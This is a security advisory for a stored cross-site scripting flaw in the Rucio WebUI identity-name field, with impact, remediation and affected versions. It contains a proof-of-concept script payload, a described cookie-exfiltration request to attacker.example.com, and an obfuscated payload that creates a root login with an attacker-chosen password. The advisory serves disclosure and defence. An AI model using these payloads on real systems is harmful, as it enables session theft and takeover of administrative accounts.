Rucio WebUI has a Stored Cross-site Scripting (XSS) vulnerability its Identity Name

Description

Summary

A stored Cross-site Scripting (XSS) vulnerability was identified in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.


Details

The identity name is stored and later rendered without output encoding.

Create Path:
Admin > Account Management > ACCOUNT NAME > Add Account Identity

Trigger Path:
Admin > Account Management > ACCOUNT NAME
(https://127.0.0.1:8443/ui/account?account=pentest)

Request

POST /proxy/accounts/pentest/identities HTTP/1.1
...
{"identity":"<script>alert(document.cookie)</script>","authtype":"SSH","email":"Test"}

Response

HTTP/1.1 201 CREATED
...
Created

Storing XSS payload in account identity name
<img width="1385" height="807" alt="Storing XSS payload in account identity name" src="https://github.com/user-attachments/assets/e4209ef4-fd88-492f-9fb0-afb7d04b15ce" />

Triggering XSS payload when viewing account
<img width="1395" height="745" alt="Triggering XSS payload when viewing account" src="https://github.com/user-attachments/assets/e6217669-a0f7-4aba-bb05-f4fb7049611c" />


Impact

Any authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.

The impact is amplified by:
- Session cookies that are accessible to JavaScript (missing HttpOnly flag).
- API tokens exposed to the WebUI via JavaScript variables.

An attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).

Attackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.

XSS Payload to Create Root UserPass

&lt;img src=x onerror=(function(){o={};o.method=&#x27;PUT&#x27;;o.credentials=&#x27;include&#x27;;o.headers={&#x27;X-Rucio-Username&#x27;:&#x27;attackeruser&#x27;,&#x27;X-Rucio-Password&#x27;:&#x27;AttackerPassword123&#x27;,&#x27;X-Rucio-Email&#x27;:&#x27;[email protected]&#x27;,&#x27;X-Rucio-Auth-Token&#x27;:token};fetch(String.fromCharCode(47)+&#x27;identities&#x27;+String.fromCharCode(47)+&#x27;root&#x27;+String.fromCharCode(47)+&#x27;userpass&#x27;,o)})()&gt;

Remediation / Mitigation

All client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as .html() should be avoided unless the content is explicitly sanitized. Safer alternatives include .text(), creating text nodes, or using a templating system that enforces automatic escaping.

Additional defense-in-depth measures include:
- Enforcing a strict Content Security Policy (CSP).
- Setting the HttpOnly flag on session cookies.
- Avoiding exposure of API tokens in JavaScript-accessible variables.

> Note that many pages were found setting the API token as token in an authenticated response like var token = &quot;root-root-webui-...:&quot; (See /ui/list_accounts for example)


References

Basic information

Type
reviewed
Severity
medium
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-02-25 19:29:37 UTC
Updated
2026-02-27 21:50:25 UTC
GitHub reviewed
2026-02-25 19:29:37 UTC
NVD published
2026-02-25

EPSS Score

Score Percentile
0.08% 23.66%

CVSS Scores

Base score Version Severity Vector
6.1 3.1
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:H)
They need powerful rights—admin, root, or similar—before this pays off.
User interaction (UI:R)
A real person has to do something—click, install, enable—otherwise it doesn’t land.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:N)
Service keeps running; no real outage angle.

Identifiers

CWEs

CWE id Name
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag

Credits

  • d-woosley (reporter)

Affected packages (3)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip rucio-webui < 35.8.3 35.8.3
pip rucio-webui >= 36.0.0rc1, < 38.5.4 38.5.4
pip rucio-webui >= 39.0.0rc1, < 39.3.1 39.3.1

References

cvelogic Threat Intelligence